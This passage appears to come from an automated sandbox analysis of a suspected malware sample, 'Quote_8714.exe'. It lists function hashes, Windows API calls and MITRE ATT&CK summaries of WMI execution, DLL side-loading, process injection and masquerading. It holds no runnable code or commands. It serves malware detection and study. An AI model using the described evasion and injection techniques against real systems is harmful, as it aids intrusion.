Instruction ID: 5c7552a1aa9ec9ebfc5a7dd50386eb79d9af3ffb138c5e04886706f0af0fe2db
Opcode Fuzzy Hash: acf7c6a4d7ffbd4372b1aa428eee112c5f99a4c38f58bf568b6d2af12389c274
Instruction Fuzzy Hash: 14F07F76E0021ACBCF009F85D85059CFBB1FF59325B158296DA587B211E370AA968B80

Function 04FF3618 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f592bd9cf4d16045749ba57c4f2f48c822626451c4497854d9985f1c8209efdf
Instruction ID: 9224be92300486e4cb281a672ff1b45e211a94ec076246106f0fd113b26bc4b5
Opcode Fuzzy Hash: f592bd9cf4d16045749ba57c4f2f48c822626451c4497854d9985f1c8209efdf
Instruction Fuzzy Hash: 26E0E6B1A01208EFDB00FFA4E94145DBBB5EB483047108599E80997319DB366F15EB51

Function 04FF6180 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1dee40c54a70e952bb73f92e2a16460abb3ccbc199eaa6998f022452397254f
Instruction ID: 4e4799cce53eeb091569b5359c3c9a784a7d1da75b1d3b2520df617665a27d74
Opcode Fuzzy Hash: e1dee40c54a70e952bb73f92e2a16460abb3ccbc199eaa6998f022452397254f
Instruction Fuzzy Hash: F3D05E303107149FC728DB1CE840C5AB3EAEF8871032586BAF109C7771DA60FC064784

Function 04FF7FC7 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0afda636aae613bf2df9f64ce1b142f136996e59eab88050bafcfa7cb1c905c5
Instruction ID: fbdb416b0c793672b4ec1e6f92bbd48649abc8f247cb89d5c3994e09fa27cf6c
Opcode Fuzzy Hash: 0afda636aae613bf2df9f64ce1b142f136996e59eab88050bafcfa7cb1c905c5
Instruction Fuzzy Hash: E1D022273252200BC309217CFC433E827D6CBCA651B4A80BBF612D3782CC2C8C0723A9

Function 04FF3F30 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 082198687b50afc6145880d4aefde3e0f53f914c7fe9b740d8dab24ad1c47e48
Instruction ID: a04c857c336b3cd774e39f9b6ceed0ff6b2e4af4e24feb440e5cd77441558b5c
Opcode Fuzzy Hash: 082198687b50afc6145880d4aefde3e0f53f914c7fe9b740d8dab24ad1c47e48
Instruction Fuzzy Hash: EBE09236101209DFCB05EF54D844C557BBAFF05305B55C0A6EA094F231D732E966DB40

Function 04FF91C0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 623a1491f54255f36ebceb977d17dc873d06c2a504d5319ce1a85c06c733984f
Instruction ID: a411fbac512e200a37a6cd40af3a5702d06a8921c2ade94e62718c71e4c46826
Opcode Fuzzy Hash: 623a1491f54255f36ebceb977d17dc873d06c2a504d5319ce1a85c06c733984f
Instruction Fuzzy Hash: 90D0127175820A87DB185BB6FC5DF36739C9F8070AB044079E90EC1550FB96F853E521

Function 04FF91B2 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d36ec6cc00ceebd4334079e8450d2e7b1675017626b343337d1363a3c259dd13
Instruction ID: 0ee779ac7d49cb4650ceda15a5d49031c41a2828c298b54a147ba439f3ed9653
Opcode Fuzzy Hash: d36ec6cc00ceebd4334079e8450d2e7b1675017626b343337d1363a3c259dd13
Instruction Fuzzy Hash: 26D0A7715082898BC70417A6A858F753B28AF44615F080078DA4541022FA44B813E611

Function 04FF4F1B Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 634dadbeb13e51d9ac61b5560d85a01f8d6dc5a5b68b63e43b659aa1f7dd3a80
Instruction ID: d8adb3943f5e372de5f4b5d38f76250bf05d4238b0c4803f7a1bc48b710f2cb4
Opcode Fuzzy Hash: 634dadbeb13e51d9ac61b5560d85a01f8d6dc5a5b68b63e43b659aa1f7dd3a80
Instruction Fuzzy Hash: C7C04C2275553513E70821E9A8515ED678DCBCAA69B01407AD61D976418C85CD4307DA

Function 04FF4F20 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caf020a2751b39766a633093b1bd476afe94306334a369feefbb9a5c9a7ec122
Instruction ID: c8d6dbd33edc8425d1076cc18dcf490a49060814e6473b15acb44dbbe025f253
Opcode Fuzzy Hash: caf020a2751b39766a633093b1bd476afe94306334a369feefbb9a5c9a7ec122
Instruction Fuzzy Hash: 1DB09B2231453513D708319D68105BE72CD4BC6669F410067960D977418CC59C4207DE

Non-executed Functions

Function 0BCA86B8 Relevance: 5.3, Strings: 4, Instructions: 264COMMON

Download Yara Rule

Strings

Hbq, xrefs: 0BCA882E
(bq, xrefs: 0BCA8802
(&^q, xrefs: 0BCA8989
, xrefs: 0BCA8754

Memory Dump Source

Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd

Similarity

API ID:
String ID: $(&^q$(bq$Hbq
API String ID: 0-1723523991
Opcode ID: bc3ef87479ec2829e191669bd370717333691e51981b491597d8f3160d9ccdc4
Instruction ID: d08661fc96c3cf48a68d6e9d12ce464605de52eaede081d33844588609736e55
Opcode Fuzzy Hash: bc3ef87479ec2829e191669bd370717333691e51981b491597d8f3160d9ccdc4
Instruction Fuzzy Hash: FB91CE70E0121A9FDB18DF79C844AAFBAF6EF88704F108429E416E7354DF359A05CBA5

Function 0BCAE51F Relevance: 2.0, Strings: 1, Instructions: 700COMMON

Download Yara Rule

Strings

fff?, xrefs: 0BCAEB97

Memory Dump Source

Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd

Similarity

API ID:
String ID: fff?
API String ID: 0-4136771917
Opcode ID: 0093239d104e32995563500b04e954c4259746077e1b00e2bd32975ef34b19ec
Instruction ID: 60f73455fd2ee381776cf986d7dcdc06151c41050f68f5eeebb2608a18c89f1d
Opcode Fuzzy Hash: 0093239d104e32995563500b04e954c4259746077e1b00e2bd32975ef34b19ec
Instruction Fuzzy Hash: 4962263681061ADECF11DF90C884AD9B7B2FF9A304F1586D5E9087B161EB71AAD5CF80

Function 0723C870 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

KOP, xrefs: 0723C8CB

Memory Dump Source

Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd

Similarity

API ID:
String ID: KOP
API String ID: 0-1291419287
Opcode ID: 52c7c7f5ccc6a505933f93cefca183610833c74b5e4b3beef597a3988beb1c8d
Instruction ID: 496258988961825a380b8d8d28bc9e34bd352038035c5ec371ae2b917402e66b
Opcode Fuzzy Hash: 52c7c7f5ccc6a505933f93cefca183610833c74b5e4b3beef597a3988beb1c8d
Instruction Fuzzy Hash: AAE1C8B4E102198FCB14DFA9C5809AEBBF2FF89304F248159E415AB356D731AD82CF61

Function 04F20040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82c784e4303565533dca55f59f3be3ede6dd8c1a01c50072a9fc910b8af6fef6
Instruction ID: ec88f7ebcf50ce0c23b3ea194d3e5b69a69ccab865986a8601f2ac149e97ba35
Opcode Fuzzy Hash: 82c784e4303565533dca55f59f3be3ede6dd8c1a01c50072a9fc910b8af6fef6
Instruction Fuzzy Hash: AC1295B8C827458AE310CF65E84C1893BB1BB45319FD04E2AD261DB2E5DBBC216ECF54

Function 0723A668 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4638193ba271fa9e1cfd2ddbb770e8cf0d0a02c98d5a8fcc91033ea49289590
Instruction ID: 1f396c50190e3869f321a5a1047e812cff3decc68c1ff2691d0c6b420114de31
Opcode Fuzzy Hash: b4638193ba271fa9e1cfd2ddbb770e8cf0d0a02c98d5a8fcc91033ea49289590
Instruction Fuzzy Hash: 8DE1C9B4E102198BCB14DF99C5809AEBBF2FF89305F24C169E454A7355D731AD42CFA1

Function 0723BF60 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03cb94a957bb37665de32442b472c26af72ee9bde339248b1762021d20d22a34
Instruction ID: 849f1d83d1c69fba45155d267fec63257eb3f4a1cd11c7b01833bf4d3e3594ea
Opcode Fuzzy Hash: 03cb94a957bb37665de32442b472c26af72ee9bde339248b1762021d20d22a34
Instruction Fuzzy Hash: B4E1C8B4E102598FCB14DFA9C5809AEBBF2FB89304F248169E415BB355D731AD82CF61

Function 07239DF8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46b38417340ad3e7556d71268fae103c4b07e61759880b6bc2b71e4742980344
Instruction ID: 07e1aa81d36611d6aeecba64189aa426323240cc3f6020353a403a7cfd44eb11
Opcode Fuzzy Hash: 46b38417340ad3e7556d71268fae103c4b07e61759880b6bc2b71e4742980344
Instruction Fuzzy Hash: DEE1C7B4E142198FCB14DFA9C5809AEBBF2FF89304F248169E454AB356D731AD42CF61

Function 0106DD14 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 939e7fb3bb992e0c131aeca70e516068df219f723277a1e78f839b6fe0ed80c3
Instruction ID: d2d2504c44cf3271a6d08af25f816538a670441a8313d2f4ce20e5dd51f539b7
Opcode Fuzzy Hash: 939e7fb3bb992e0c131aeca70e516068df219f723277a1e78f839b6fe0ed80c3
Instruction Fuzzy Hash: BCA19032E002168FCF05EFB9D4505EEBBF6FF94300B1585AAE945AB265DB31E915CB80

Function 04F2F543 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78f0ab11db1639ae754ae88f3ef88e1780f561991b52db3165e15f40862e95d5
Instruction ID: 4a92e9d2fc14daebcfc8121f63ce796f5ae50cda1e98fd2c6a17cb2ee1831ac6
Opcode Fuzzy Hash: 78f0ab11db1639ae754ae88f3ef88e1780f561991b52db3165e15f40862e95d5
Instruction Fuzzy Hash: 8D219A83969AB88BDB91917788BA2C52BC1DB1B11CF18D7ACD2F8255E3E5550083C346

Function 04F2F53F Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b85311b76aefa93eb48618a1dcf909f489f7190960462308f2202dc3e88ea9b
Instruction ID: 3fa8271806ea6903d5ba30141c9fe48e140427171d0d1aebdd62e9ad87137f44
Opcode Fuzzy Hash: 7b85311b76aefa93eb48618a1dcf909f489f7190960462308f2202dc3e88ea9b
Instruction Fuzzy Hash: E22188C396AEB8CBDB91917788BA2C52BC1DB1B11CF18D7ACD2BC256E3E5550043D346

Analysis Process: Quote_8714.exePID: 7392, Parent PID: 4464COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	89
Total number of Limit Nodes:	9

Executed Functions

Function 00CAD4D8 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00CAD566
GetCurrentThread.KERNEL32 ref: 00CAD5A3
GetCurrentProcess.KERNEL32 ref: 00CAD5E0
GetCurrentThreadId.KERNEL32 ref: 00CAD639

Memory Dump Source

Source File: 00000005.00000002.2941084634.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ca0000_Quote_8714.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 41911dc5dad7a0eeb587c658cb1dbfe6f2635dded46980d6ac451d2cdf0ba619
Instruction ID: 7e913cd4372bad10b5f0f1b3a2e133558644f48db6aaef69cad586b749df80fc
Opcode Fuzzy Hash: 41911dc5dad7a0eeb587c658cb1dbfe6f2635dded46980d6ac451d2cdf0ba619
Instruction Fuzzy Hash: 205149B0D0020A8FDB14DFA9D548BDEBBF5BB49308F208459E01AA7360DB749985CF65

Function 00CAD4E8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00CAD566
GetCurrentThread.KERNEL32 ref: 00CAD5A3
GetCurrentProcess.KERNEL32 ref: 00CAD5E0
GetCurrentThreadId.KERNEL32 ref: 00CAD639

Memory Dump Source

Source File: 00000005.00000002.2941084634.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ca0000_Quote_8714.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 5ebd7027916f962b0463528bbe37b3b8e1952be75fc1689b2480381f8b285104
Instruction ID: 36d30dd5d8553706a295c3c3f06b04973d1207228eb902dff48c1a9a93e071d7
Opcode Fuzzy Hash: 5ebd7027916f962b0463528bbe37b3b8e1952be75fc1689b2480381f8b285104
Instruction Fuzzy Hash: C85139B0D0020A8FDB14DFA9D548BDEBBF1BF49318F208459E41AA7360DB749985CF65

Function 0632D638 Relevance: 1.7, APIs: 1, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0632D89E

Memory Dump Source

Source File: 00000005.00000002.2946945838.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6320000_Quote_8714.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1e98553e4ea8ef60a93db9690c811af971011fde53b66c5c581a341e9059102e
Instruction ID: b27594242ecfa5a6d44e589de3ddffe8b38109319e6ae4e7532e6eaa71ee2311
Opcode Fuzzy Hash: 1e98553e4ea8ef60a93db9690c811af971011fde53b66c5c581a341e9059102e
Instruction Fuzzy Hash: E6815370A00B568FD7A4DF29D49079ABBF1FF88304F108A2ED48AD7A50D735E949CB90

Function 00CAD870 Relevance: 1.6, APIs: 1, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CAD987

Memory Dump Source

Source File: 00000005.00000002.2941084634.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ca0000_Quote_8714.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f31dfe115e53c8af014ef230789a3601305b9dfea1fe4d2d50947343aed95815
Instruction ID: ea5087b439e251673cb983cd8a65759a44dae5dcf65767d53ccc303013b546c7
Opcode Fuzzy Hash: f31dfe115e53c8af014ef230789a3601305b9dfea1fe4d2d50947343aed95815
Instruction Fuzzy Hash: FD41C4759053449FCB01CFA5D8406DABFF4EF46314F19849BE085EB692C3399946CBA1

Function 06313D98 Relevance: 1.6, APIs: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2946920340.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6310000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d777fafe47c5a595f4c8056b149f48ce359019668ebaaab06f4b4d2c6e0fc4fe
Instruction ID: a14f40204df4f955ddc260191cb5db2eed6167fc8074d0483bde7091ef6b92e3
Opcode Fuzzy Hash: d777fafe47c5a595f4c8056b149f48ce359019668ebaaab06f4b4d2c6e0fc4fe
Instruction Fuzzy Hash: 3C413132E143998FCB04DF79D8542AEBBF5EF89310F14856AD444AB291DB34A984CBE1

Function 00CAD900 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CAD987

Memory Dump Source

Source File: 00000005.00000002.2941084634.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ca0000_Quote_8714.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: edde6b71ed9553edb211ed2dfc82888f590e634033516f14d3046bfbc7719161
Instruction ID: cbd59dbf05b18818e31b90a1458c4d6922af7fe3e1ae38265b0ff5726c7b5781
Opcode Fuzzy Hash: edde6b71ed9553edb211ed2dfc82888f590e634033516f14d3046bfbc7719161
Instruction Fuzzy Hash: 4321E4B5900209DFDB10CFAAD584ADEFFF4EB48310F14841AE959A3310C374A940CFA4

Function 00CAD8F8 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CAD987

Memory Dump Source

Source File: 00000005.00000002.2941084634.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ca0000_Quote_8714.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 236204a0d2d1eb5e3d75ba4514d422ed4962b2def2cfb9870e8a9d59b5c29de3
Instruction ID: 68c629ad65bd5413bf81896dcb773ce8b2c24cf586209f342c5f28c59105b9b1
Opcode Fuzzy Hash: 236204a0d2d1eb5e3d75ba4514d422ed4962b2def2cfb9870e8a9d59b5c29de3
Instruction Fuzzy Hash: C321E2B5900209EFDB10CFA9D584ADEFBF4FB48314F24841AE959A7250C374A944CFA4

Function 06313E69 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06313DEA), ref: 06313ED7

Memory Dump Source

Source File: 00000005.00000002.2946920340.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6310000_Quote_8714.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 028ea9097c893ef06f636746b0aa0c643d10030e7d060e152d4d7ca7298aa38e
Instruction ID: 468dc2833913ea53481a8ad6c878f9a10159227d20982607158961cbde43d76f
Opcode Fuzzy Hash: 028ea9097c893ef06f636746b0aa0c643d10030e7d060e152d4d7ca7298aa38e
Instruction Fuzzy Hash: C121F4B2C00659DFDB10DF9AC944BAEFBF4AB48320F14856AD858A7241D378A944CFA5

Function 063125E4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06313DEA), ref: 06313ED7

Memory Dump Source

Source File: 00000005.00000002.2946920340.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6310000_Quote_8714.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 28c1ada88a2b4194fe92eda48ecfa7a76f1a061dc8f912e6a4094ccfd3f1ccbb
Instruction ID: baaa29c29259d876cc8c563beec57197f587cf40d27c5346a5bbb5a31b831bfa
Opcode Fuzzy Hash: 28c1ada88a2b4194fe92eda48ecfa7a76f1a061dc8f912e6a4094ccfd3f1ccbb
Instruction Fuzzy Hash: 941103B2C006599FDB14DF9AC444BEEFBF4AB48320F10816AE818A7251D378A944CFE5

Function 0632D838 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0632D89E

Memory Dump Source

Source File: 00000005.00000002.2946945838.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6320000_Quote_8714.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d9302c295f2995823a033ffcc84730b56d6421335a1ff3d34a55eec9eb4a02ca
Instruction ID: 93858aca4782f5b2bcccbded2c133f5666ca002073d96428608c823ebb98508f
Opcode Fuzzy Hash: d9302c295f2995823a033ffcc84730b56d6421335a1ff3d34a55eec9eb4a02ca
Instruction Fuzzy Hash: 211110B5C002598FCB10DF9AC844ADEFBF4AF88324F10842AD828A7210C375A545CFA5

Function 00C5D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2940850765.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c5d000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25b0d7488cd6e25d31ea518c1b5a3f26de43e609dacb837fce0380589facf572
Instruction ID: a051aae96bde311411131f7d5ec1abe8c6dc53faa1d43ca87d8bc43a80e8e6eb
Opcode Fuzzy Hash: 25b0d7488cd6e25d31ea518c1b5a3f26de43e609dacb837fce0380589facf572
Instruction Fuzzy Hash: A221F279604300DFDB24DF14D9C4B26BBA5EBC4315F20C569EC0A4B296C33AD88BCA66

Function 00C5D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2940850765.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c5d000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69df75d156841aad38b4140d112eec7c058b1eaea1251345d5177e783103d13b
Instruction ID: d581f1ba92d002a1d22bcde0165bfbd5f7aafa8e6d48bf1f2b1748010fafff59
Opcode Fuzzy Hash: 69df75d156841aad38b4140d112eec7c058b1eaea1251345d5177e783103d13b
Instruction Fuzzy Hash: 70218E755093808FDB12CF24D994715BF71EB86314F28C5EAD8498F2A7C33A984ACB62

Function 00C4D628 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2940779426.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c4d000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a110806d3d8fd17b65a6739ab4f2dfda247d1699a46615849abeea34682f0cd2
Instruction ID: 2ebafdd1639a725f08d316c8ab0af30e3d1d96ad5377f7ad1acbc94a50cbaceb
Opcode Fuzzy Hash: a110806d3d8fd17b65a6739ab4f2dfda247d1699a46615849abeea34682f0cd2
Instruction Fuzzy Hash: AEF062714093449EE7109A16D8C4BA2FFA8EF51725F18C85AFD1D4B286C3799844CAB1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

